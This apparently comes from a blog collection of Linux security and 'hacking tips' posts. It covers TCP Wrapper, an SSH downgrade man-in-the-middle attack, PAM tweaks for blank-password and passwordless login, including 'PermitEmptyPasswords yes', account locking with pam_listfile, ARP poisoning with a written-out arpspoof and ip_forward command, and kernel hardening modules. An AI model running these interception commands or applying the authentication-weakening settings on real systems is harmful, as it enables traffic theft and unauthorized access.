While configuring TCP Wrapper you use the base name, I mean in my example vsftpd and sshd, to set access rights. For example you can set the following in /etc/hosts.deny

sshd : ALL

To deny ssh access to all computers.

SSH Session Hacking

An SSH session can be hijacked using a MiTM (Man in The Middle) attack known as the ssh downgrade attack. Let us understand it. Suppose you are accessing machine C from machine A using ssh.

A-------------------------------->C

Now suppose there is a machine B in the middle which alters requests coming from A, forwards them to C, and vice versa.

A------(ssh request)--->B----------------->C

Now A sends an ssh request to C. C replies that it supports version 1 and version 2 of the SSH protocol, but B alters the reply packet and tells A that C supports only version 1 of SSH.

A-----<-----(C only supports v1)-----B-----<------C (supports v1 and v2 of ssh)

A therefore falls back to SSH version 1, and B sits in the path sniffing the packets.

A-------->(ssh1)-----------B(sniffs packets)------>------C

Since version 1 of ssh is insecure, by sniffing packets you can get the login and password details passed over ssh. This attack is known as the ssh downgrade attack, a MiTM implementation. You can try this using ettercap (http://ettercap.sourceforge.net/).

Set blank root password in linux

Like in the windows O.S., how do we set a blank password for a user?


We have a command

# passwd -d <user name>

It will set a blank password for the user, but what about login without any password prompt at all, i.e. linux not asking for a password?

Yes, I am talking about my favourite topic, "PAM"

For that we have to make a change in the "/etc/pam.d/login" file
.....................................................

auth optional system-auth

instead of:

auth include system-auth
...........................................................

But in that case users can log in without a password prompt in text mode only.
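One more note on that: sshd keeps its own gate for empty passwords, controlled by the following line in /etc/ssh/sshd_config:

PermitEmptyPasswords yes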

Linux PAM , Lock account in Linux using pam_listfile.so

Dear friends, as an admin, every day my boss gives me a list of different users whose logins must be denied


so I use:

root# passwd -l user1

to lock those users, and

root# passwd -u user1

to unlock them. But I have a list of 100 users every day, so it keeps me busy for an hour each day.

Suddenly I remembered the file /etc/vsftpd/ftpusers, and with the help of pam.d I applied the same idea to login attempts. I just wrote at the top of the file

root# vi /etc/pam.d/login

auth required pam_listfile.so item=user sense=deny file=/etc/logindeny onerr=succeed

:wq!

& then I created a file and wrote the names of the users to be denied for that day

root# vi /etc/logindeny

user1

user2

user3

user4

:wq!
& now every day I have to edit only that file and my users are denied for the day.

It saves me time daily.

ARP Poisoning

When I discuss hacking tips and talk about getting the network traffic of another host on your own host, many people get confused. Believe me, it is very simple: suppose your host is in the same network as the victim host. You can pollute the ARP cache of the victim host so that traffic destined for another host gets forwarded to your host.


To understand the complete process, let us look at what happens when one host tries to access another host on the same network: the source host needs the mac address of the destination host, and the ARP protocol gets that mac address by broadcasting the IP address. I mean, suppose host A (192.168.5.1) needs to access host B (192.168.5.2). ARP on host A broadcasts the message 'who has ip 192.168.5.2, tell me your mac'. In normal circumstances B will reply with its MAC address, but in the case of ARP poisoning another host, say attacker C, replies with its own mac address, pretending the ip belongs to it. So the data that should go to B goes to C. And if ip forwarding is enabled on C, A will not notice any hacking, but C is now the Man in the Middle.

I use the arpspoof command to do this basic hacking

root# arpspoof -t 192.168.1.1 192.168.1.2

In the above statement the victim is 192.168.1.1 (in my example, host A), 192.168.1.2 is what the attacker pretends to be (in my example, host B), and the command runs on the attacker machine (in my example, host C).
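And as said above, for the victim not to notice anything, ip forwarding must be enabled on the attacker machine so that the intercepted traffic is relayed onwards:

root# echo 1 > /proc/sys/net/ipv4/ip_forward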

Linux kernel security

Where security is the top priority, we first focus on the security of the Linux kernel. Although by default the linux kernel is not very secure, there are important kernel patches to secure your linux box. These kernel patches are SELinux, AppArmor and Grsecurity. They control access between processes and objects, processes and processes, and objects and objects.


SELinux is included by default with Red Hat's CentOS/RHEL/Fedora and is available for Debian/Ubuntu, Suse, Slackware and many other distributions. Implementation of SELinux requires a high skill set.
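On a distribution that ships SELinux you can quickly check its current state (assuming the standard SELinux utilities are installed):

root# getenforce
root# sestatus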

AppArmor is released and maintained by Novell under the GPL license. It is an alternative to SELinux and very effective in securing applications. AppArmor is the default in OpenSuse and Suse Enterprise Linux. Implementation of AppArmor requires a medium-level skill set.

Grsecurity is a set of patches for the linux kernel with a focus on enhancing security. It implements RBAC (Role Based Access Control). It is available for any linux distribution and is easy to implement.